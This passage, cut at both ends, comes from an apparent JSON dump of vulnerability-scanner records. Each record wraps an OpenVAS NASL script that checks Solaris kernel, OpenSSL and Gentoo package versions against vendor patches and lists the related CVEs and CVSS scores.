\"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-48-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"122300-48\", package:\"SUNWcar.us SUNWatfsu SUNWarc SUNWnfssx SUNWcar.m SUNWudfrx SUNWpdx SUNWmdb SUNWaudit SUNWsshdu SUNWnfscx SUNWnfssu FJSVhea SUNWcsl SUNWrsg SUNWrsgx SUNWrsgk SUNWsshdr SUNWses SUNWefcx.u SUNWvolu SUNWsshr SUNWdrr.u SUNWdrrx.us SUNWssadx SUNWcsxu SUNWcarx.us SUNWpiclu SUNWmdbx SUNWnfssr SUNWvolr SUNWdrr.us SUNWcsr SUNWefcx.us SUNWpd SUNWhea SUNWcslx SUNWcstlx SUNWcarx.u SUNWatfsr SUNWsshu SUNWcsu SUNWcar.u SUNWnfscu SUNWdrcrx.u SUNWdrrx.u SUNWssad SUNWpdu SUNWnfscr SUNWcstl SUNWudfr\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:09", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 120011-14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339", "CVE-2007-0957", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855516", "href": "http://plugins.openvas.org/nasl.php?oid=855516", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 120011-14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855516);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"120011-14\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2007-0957\", \"CVE-2006-0225\", \"CVE-2005-2969\");\n script_name( \"Solaris Update for kernel 120011-14\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-120011-14-1\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"120011-14\", package:\"SUNWcakr.u SUNWsshcu SUNWpcmci SUNWcnetr SUNWcar.us SUNWdhcsu SUNWrcmdc SUNWperl584usr SUNWixgb SUNWpsu SUNWfss SUNWatfsu SUNWopenssl-include SUNWpmu SUNWlldap SUNWipfr SUNWudapltu SUNWzoner SUNWarc SUNWipfu SUNWfmd SUNWintgige SUNWscpu SUNWbtool SUNWxge SUNWidn.u SUNWsra FJSVcpcu SUNWperl584core SUNWbart SUNWkrbu SUNWdrcr.u SUNWsmapi SUNWtavor SUNWbcp SUNWipfh SUNWmdb SUNWzfsu SUNWsndmr SUNWaudit SUNWncar SUNWldomr.v SUNWiopc.v SUNWcakr.us SUNWpapi SUNWsshdu SUNWcart200.v SUNWcpr.u SUNWkvm.u SUNWsndmu SUNWpppdu SUNWnfssu SUNWdhcm SUNWkdcu SUNWmdr SUNWkvm.v SUNWkvm.us FJSVhea SUNWpool SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWus.u SUNWcsl FJSVmdbr SUNWcpcu SUNWses SUNWsadmi SUNWvolu SUNWcpc.v SUNWib SUNWkey SUNWnisu SUNWtoo SUNWsckmr SUNWdrr.u FJSVpiclu SUNWdmgtu SUNWkvmt200.v SUNWusbu SUNWefc.u SUNWpiclu SUNWypu SUNWpoolr SUNWftduu SUNWppm SUNWuksp SUNWcakr.v SUNWslpu SUNWusb SUNWcti2.u SUNWzfsr SUNWdrr.us SUNWroute SUNWckr SUNWcsr SUNWdoc SUNWefcr SUNWaudh SUNWefcl SUNWrge SUNWtecla SUNWmdbr SUNWldomu.v SUNWpcu SUNWdscpr.u SUNWzfskr SUNWarcr SUNWmdu SUNWdcsu SUNWrcapu FJSVmdb SUNWwbsup SUNWcar.v SUNWhea SUNWqos SUNWntpu SUNWnfsckr SUNWdtrp SUNWcpc.us SUNWpl5u SUNWlibsasl SUNWcslr SUNWippcore SUNWsshu SUNWdcsr SUNWcsu SUNWust1.v SUNWcar.u SUNWnfscu SUNWesu SUNWcsd SUNWfruip.u SUNWssad SUNWcpc.u SUNWipplr SUNWpsm-lpd SUNWuprl SUNWefc.us SUNWzoneu SUNWipplu SUNWrcapr SUNWdfbh SUNWwrsm.u SUNWftdur SUNWerid SUNWauda\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:47", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 120011-14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339", "CVE-2007-0957", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855516", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855516", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 120011-14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855516\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"120011-14\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2007-0957\", \"CVE-2006-0225\", \"CVE-2005-2969\");\n script_name( \"Solaris Update for kernel 120011-14\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-120011-14-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"120011-14\", package:\"SUNWcakr.u SUNWsshcu SUNWpcmci SUNWcnetr SUNWcar.us SUNWdhcsu SUNWrcmdc SUNWperl584usr SUNWixgb SUNWpsu SUNWfss SUNWatfsu SUNWopenssl-include SUNWpmu SUNWlldap SUNWipfr SUNWudapltu SUNWzoner SUNWarc SUNWipfu SUNWfmd SUNWintgige SUNWscpu SUNWbtool SUNWxge SUNWidn.u SUNWsra FJSVcpcu SUNWperl584core SUNWbart SUNWkrbu SUNWdrcr.u SUNWsmapi SUNWtavor SUNWbcp SUNWipfh SUNWmdb SUNWzfsu SUNWsndmr SUNWaudit SUNWncar SUNWldomr.v SUNWiopc.v SUNWcakr.us SUNWpapi SUNWsshdu SUNWcart200.v SUNWcpr.u SUNWkvm.u SUNWsndmu SUNWpppdu SUNWnfssu SUNWdhcm SUNWkdcu SUNWmdr SUNWkvm.v SUNWkvm.us FJSVhea SUNWpool SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWus.u SUNWcsl FJSVmdbr SUNWcpcu SUNWses SUNWsadmi SUNWvolu SUNWcpc.v SUNWib SUNWkey SUNWnisu SUNWtoo SUNWsckmr SUNWdrr.u FJSVpiclu SUNWdmgtu SUNWkvmt200.v SUNWusbu SUNWefc.u SUNWpiclu SUNWypu SUNWpoolr SUNWftduu SUNWppm SUNWuksp SUNWcakr.v SUNWslpu SUNWusb SUNWcti2.u SUNWzfsr SUNWdrr.us SUNWroute SUNWckr SUNWcsr SUNWdoc SUNWefcr SUNWaudh SUNWefcl SUNWrge SUNWtecla SUNWmdbr SUNWldomu.v SUNWpcu SUNWdscpr.u SUNWzfskr SUNWarcr SUNWmdu SUNWdcsu SUNWrcapu FJSVmdb SUNWwbsup SUNWcar.v SUNWhea SUNWqos SUNWntpu SUNWnfsckr SUNWdtrp SUNWcpc.us SUNWpl5u SUNWlibsasl SUNWcslr SUNWippcore SUNWsshu SUNWdcsr SUNWcsu SUNWust1.v SUNWcar.u SUNWnfscu SUNWesu SUNWcsd SUNWfruip.u SUNWssad SUNWcpc.u SUNWipplr SUNWpsm-lpd SUNWuprl SUNWefc.us SUNWzoneu SUNWipplu SUNWrcapr SUNWdfbh SUNWwrsm.u SUNWftdur SUNWerid SUNWauda\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:34", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018995 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for OpenSSL", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065349", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065349", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018995.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018995 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65349\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-2940\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SLES9: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.7d~15.32\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:17", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 1185-2.\n\nThe fix used to correct CVE-2006-2940 introduced code that could lead to\nthe use of uninitialized memory. Such use is likely to cause the\napplication using the openssl library to crash, and has the potential to\nallow an attacker to cause the execution of arbitrary code.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1185-2 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57481", "href": "http://plugins.openvas.org/nasl.php?oid=57481", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1185_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1185-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 0.9.7e-3sarge4.\n\nFor the unstable and testing distributions (sid and etch,\nrespectively), these problems will be fixed in version 0.9.7k-3 of the\nopenssl097 compatibility libraries, and version 0.9.8c-3 of the\nopenssl package.\n\nWe recommend that you upgrade your openssl package. Note that\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201185-2\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 1185-2.\n\nThe fix used to correct CVE-2006-2940 introduced code that could lead to\nthe use of uninitialized memory. Such use is likely to cause the\napplication using the openssl library to crash, and has the potential to\nallow an attacker to cause the execution of arbitrary code.\";\n\n\nif(description)\n{\n script_id(57481);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-2940\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1185-2 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.7e-3sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7\", ver:\"0.9.7e-3sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.7e-3sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:19", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018995 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for OpenSSL", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65349", "href": "http://plugins.openvas.org/nasl.php?oid=65349", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018995.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018995 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65349);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-2940\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SLES9: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.7d~15.32\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:20", "description": "The remote host is missing updates announced in\nadvisory GLSA 200710-06.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200710-06 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2007-3108", "CVE-2007-5135"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:58654", "href": "http://plugins.openvas.org/nasl.php?oid=58654", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer underflow vulnerability and an information disclosure\nvulnerability have been discovered in OpenSSL.\";\ntag_solution = \"All OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8e-r3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200710-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=188799\nhttp://bugs.gentoo.org/show_bug.cgi?id=194039\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200710-06.\";\n\n \n\nif(description)\n{\n script_id(58654);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2007-3108\", \"CVE-2007-5135\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200710-06 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8e-r3\"), vulnerable: make_list(\"lt 0.9.8e-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:18", "description": "The remote host is missing updates announced in\nadvisory GLSA 200805-07.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200805-07 (ltsp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2007-4995", "CVE-2007-5958", "CVE-2007-1667", "CVE-2007-4730", "CVE-2007-3108", "CVE-2007-1351", "CVE-2007-6429", "CVE-2007-2754", "CVE-2008-0006", "CVE-2007-5269", "CVE-2007-6428", "CVE-2007-5135", "CVE-2007-5268", "CVE-2007-5760", "CVE-2007-5266", "CVE-2007-2445", "CVE-2007-6427"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:61041", "href": "http://plugins.openvas.org/nasl.php?oid=61041", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be 